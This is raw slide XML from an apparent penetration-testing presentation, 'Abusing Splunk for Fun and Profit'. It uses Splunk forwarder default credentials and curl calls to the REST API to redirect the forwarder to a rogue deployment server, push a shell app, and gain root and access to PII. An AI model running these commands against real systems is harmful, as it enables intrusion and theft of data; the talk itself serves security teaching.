        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B7C89A-9E58-E740-BA55-EB34D009762B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694406" y="1445741"/>
            <a:ext cx="1908217" cy="1908217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="https://media.licdn.com/mpr/mpr/shrinknp_200_200/AAEAAQAAAAAAAAYxAAAAJGZhOGRjYmRlLWFhZjUtNDRlZC05Yjc4LWE0MzVkNmQ1YTBhYQ.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB585746-8A2D-364B-9E1C-6F00A7079C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9122" y="1445741"/>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099CFF04-24C3-BE44-94F2-71617D0E0669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6872416" y="3738667"/>
            <a:ext cx="1913238" cy="1913238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385595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Creds Again?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The Splunk Universal Forwarder still had default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Known issue, Splunk restricted the REST API to localhost only when default credentials were used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>admin // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>changeme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5022B3CB-399C-3F4E-9C1E-E9E5B9660794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428750" y="4001294"/>
            <a:ext cx="7429500" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86443F60-52C9-B448-97A1-5FA8BC3E98A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9153525" y="3212370"/>
            <a:ext cx="1905000" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="790117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Curl to the Rescue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="4000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Step 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="3600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Test hypothesis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -u "admin:changeme" -k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1:8089/services/deployment/client</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s:key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>targetUri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;10.0.1.20:8089&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s:key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"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1015384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955B67B-0E79-8840-B152-6B1FBACC1B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380905"/>
            <a:ext cx="8013700" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BFD5CE-D18B-E244-8602-355DB8210DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029904" y="1234958"/>
            <a:ext cx="3583621" cy="3282597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abusing Splunk for Fun and Profit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1837500"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Step 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Set up my own Deployment server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="960837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Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TA-Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Step 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Write some code (or borrow it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66911728-87B4-4340-AEFE-A5ADAB3C000B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="8156"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2310938" y="3020292"/>
            <a:ext cx="7570124" cy="3621662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220323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Hard Way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Step 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Direct the UF to the new deployment server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -u "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin:changeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -k "https://127.0.0.1:8089/services/deployment/client/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>targetUri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='&lt;IP&gt;:&lt;port&gt;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -u "admin:changeme" -k "https://127.0.0.1:8089/services/server/control/restart" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d ‘’</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69382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Deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5814060" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Step 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Deploy the new app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Takes up to 5 minutes to check in and deploy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961EC1EF-39C9-6343-8E4F-A3EF4C9C0953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259480" y="1021216"/>
            <a:ext cx="3468392" cy="4543745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1222203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Then We Wait</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Step 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Profit!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E940C5A-5A0F-7D49-A919-38298E5225AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4994333" y="584274"/>
            <a:ext cx="5590540" cy="5327455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014691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Abusing Splunk for Fun and Profit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>In this particular instance, once I had root I was able to pillage all of the Chef scripts for credentials and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> repositories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Complete exploitation of every server in the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>S3 access (encrypted PII)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reverse engineered the web application to discover encryption key storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Fully decrypted PII, ability to change, delete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3488583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 Story Short</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADF7884B-74BB-C740-9FCB-E9B6E3838B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537549" y="1342846"/>
            <a:ext cx="5116902" cy="5116902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3262133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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754832A5-EC0A-3749-BAF9-773447F13B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1933188" y="1690688"/>
            <a:ext cx="8325623" cy="4162812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325864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A7FD2-1DE4-7A47-B1B5-8CBF3D43A9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Easy Way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
